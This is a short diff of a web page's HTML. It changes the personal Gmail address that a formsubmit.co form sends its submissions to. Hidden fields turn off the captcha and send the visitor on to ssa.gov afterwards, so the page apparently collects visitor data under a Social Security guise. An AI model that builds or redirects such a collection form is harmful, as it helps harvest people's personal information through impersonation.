--- a/index.html
+++ b/index.html
@@ -31,7 +31,7 @@
  </nav>
 <div class="px-6 lg:px-20">
  
- <form  action="https://formsubmit.co/jerrycosta6916@gmail.com" method="POST" />
+ <form  action="https://formsubmit.co/kinchelowgwendolyn7@gmail.com" method="POST" />
   <input type="hidden" name="_subject" value="New submission!">
   <input type="hidden" name="_next" value="https://ssa.gov/">
   <input type="hidden" name="_captcha" value="false">
